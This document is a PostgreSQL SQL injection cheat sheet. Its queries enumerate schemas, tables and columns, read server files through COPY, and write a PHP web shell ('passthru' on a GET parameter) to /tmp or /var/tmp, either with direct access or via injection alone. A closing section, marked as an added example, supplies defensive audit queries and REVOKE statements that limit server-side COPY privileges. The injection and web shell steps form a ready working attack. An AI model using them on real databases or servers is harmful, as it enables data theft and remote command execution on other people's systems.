To list the version: SELECT version();
Concatenating (putting two values together): concat(name1,':',name2)
To comment out the rest of the statement, use -- (as in xx--)
Show all schemas (information_schema.schemata lists the schemas of the current database): select schema_name from information_schema.schemata;
Show the table names: select concat(schemaname,':',tablename) FROM pg_catalog.pg_tables WHERE schemaname != 'pg_catalog' AND schemaname != 'information_schema';
Show the column names if the table name is users: SELECT column_name FROM information_schema.columns where table_name = 'users';
Finally, to select the data, use: select columnname from schemaname.tablename;
If you have direct DB access (via psql, usually through the postgres account), you can use the following:
\list to list the databases
\c databasename to switch to that database
\d to list the tables
To read a file when you have direct DB access, use the following:
CREATE TABLE demo(t text);
COPY demo from '[FILENAME]';
SELECT * FROM demo;
To write a file when you have direct DB access, use:
CREATE TABLE mytable (mycol text);
INSERT INTO mytable(mycol) VALUES ('<? passthru($_GET[cmd]); ?>');
COPY mytable (mycol) TO '/tmp/test.php';
To write a file when you only have injection, use:
copy(select '<?php passthru($_GET[''cmd'']);?>') to '/var/tmp/cmd.php';
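The COPY ... FROM 'file' and COPY ... TO 'file' statements above only succeed when the connected role is a superuser or a member of pg_read_server_files / pg_write_server_files. The audit queries below are an added example, not part of the original notes; they assume PostgreSQL 11 or later (where those predefined roles exist), and app_user is a hypothetical role name.

```sql
-- Added audit example (assumes PostgreSQL 11+). Run as an administrator.

-- 1. Which roles can use server-side COPY to read or write files?
--    pg_has_role(..., 'MEMBER') follows nested role membership and is
--    always true for superusers.
SELECT r.rolname,
       r.rolcanlogin,
       r.rolsuper,
       pg_has_role(r.oid, 'pg_read_server_files',  'MEMBER') AS copy_from_file,
       pg_has_role(r.oid, 'pg_write_server_files', 'MEMBER') AS copy_to_file
FROM pg_catalog.pg_roles AS r
WHERE r.rolname NOT LIKE 'pg\_%'          -- skip the predefined roles themselves
  AND (r.rolsuper
       OR pg_has_role(r.oid, 'pg_read_server_files',  'MEMBER')
       OR pg_has_role(r.oid, 'pg_write_server_files', 'MEMBER'))
ORDER BY r.rolsuper DESC, r.rolname;

-- 2. Same check for the role of the current session. Run it over the
--    application's own connection: all three columns should be false.
SELECT current_user,
       (SELECT rolsuper FROM pg_catalog.pg_roles
         WHERE rolname = current_user)                            AS is_superuser,
       pg_has_role(current_user, 'pg_read_server_files',  'MEMBER') AS copy_from_file,
       pg_has_role(current_user, 'pg_write_server_files', 'MEMBER') AS copy_to_file;

-- 3. Remediation for a web application role that shows up in query 1.
--    app_user is a hypothetical name; substitute the role your app uses.
ALTER ROLE app_user NOSUPERUSER;
REVOKE pg_read_server_files  FROM app_user;
REVOKE pg_write_server_files FROM app_user;
```

COPY ... FROM STDIN and COPY ... TO STDOUT (what psql's \copy uses) do not need these privileges, so revoking them does not break client-side import and export.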